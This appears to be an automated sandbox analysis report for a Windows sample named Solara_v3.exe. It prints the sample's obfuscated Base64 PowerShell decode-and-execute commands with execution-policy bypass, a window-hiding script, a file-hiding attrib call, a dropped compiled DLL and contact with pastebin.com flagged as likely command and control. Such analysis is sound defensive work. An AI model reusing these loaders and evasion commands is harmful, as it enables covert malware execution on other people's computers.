    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iex
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iexJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\attrib.exe "attrib" +h C:\WindowsSystemJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"Jump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nologo -noninteractive -noprofile -executionpolicy bypass -encodedcommand wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsaf
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nologo -noninteractive -noprofile -executionpolicy bypass -encodedcommand wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media12
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture2
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA Secrets12
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585428 Sample: Solara_v3.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 80 29 pastebin.com 2->29 33 Malicious sample detected (through community Yara rule) 2->33 35 Yara detected Powershell decode and execute 2->35 37 Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet 2->37 41 2 other signatures 2->41 9 Solara_v3.exe 2 2->9         started        signatures3 39 Connects to a pastebin service (likely for C&C) 29->39 process4 dnsIp5 31 pastebin.com 104.20.3.235, 443, 49736 CLOUDFLARENETUS United States 9->31 43 Encrypted powershell cmdline option found 9->43 45 Bypasses PowerShell execution policy 9->45 13 powershell.exe 22 9->13         started        16 conhost.exe 9->16         started        18 attrib.exe 1 9->18         started        signatures6 process7 file8 27 C:\Users\user\AppData\...\py0wfw3n.cmdline, Unicode 13->27 dropped 20 csc.exe 3 13->20         started        process9 file10 25 C:\Users\user\AppData\Local\...\py0wfw3n.dll, PE32 20->25 dropped 23 cvtres.exe 1 20->23         started        process11

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Solara_v3.exe8%ReversingLabsWin64.Malware.Generic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://streams.spec.whatwg.org/0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#concept-headers-fill0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#concept-headers-append0%Avira URL Cloudsafe
    https://url.spec.whatwg.org/#port-state0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#forbidden-response-header-name0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#concept-network-error0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#get-the-parent0%Avira URL Cloudsafe
    https://w3c.github.io/permissions/#permissionstatus0%Avira URL Cloudsafe
    https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#body-mixin0%Avira URL Cloudsafe
    https://dl.deno.land/canary/(bN0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#concept-event-listener-invoke0%Avira URL Cloudsafe
    https://w3c.github.io/permissions/#status-of-a-permission0%Avira URL Cloudsafe
    https://dl.deno.land/canary/0%Avira URL Cloudsafe
    https://crbug.com/v8/8520turbo_fast_api_callsenable0%Avira URL Cloudsafe
    https://w3c.github.io/permissions/#permission-descriptor0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#retarget0%Avira URL Cloudsafe
    https://w3c.github.io/FileAPI/0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#concept-event-path-append0%Avira URL Cloudsafe
    https://url.spec.whatwg.org/#idna0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#concept-construct-readablestream0%Avira URL Cloudsafe
    https://dl.deno.land/canary-latest.txt0%Avira URL Cloudsafe
    https://fetch.spec.whatwg.org/#dom-headers0%Avira URL Cloudsafe
    https://dom.spec.whatwg.org/#event-path0%Avira URL Cloudsafe
    https://some/file.ts0%Avira URL Cloudsafe
    https://wicg.github.io/import-maps/0%Avira URL Cloudsafe
    https://w3c.github.io/user-timing)0%Avira URL Cloudsafe
    https://dl.deno.land/canary/(b0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pastebin.com
    		104.20.3.235
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.rapidtables.com/convert/color/hsl-to-rgb.htmlSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
        		high
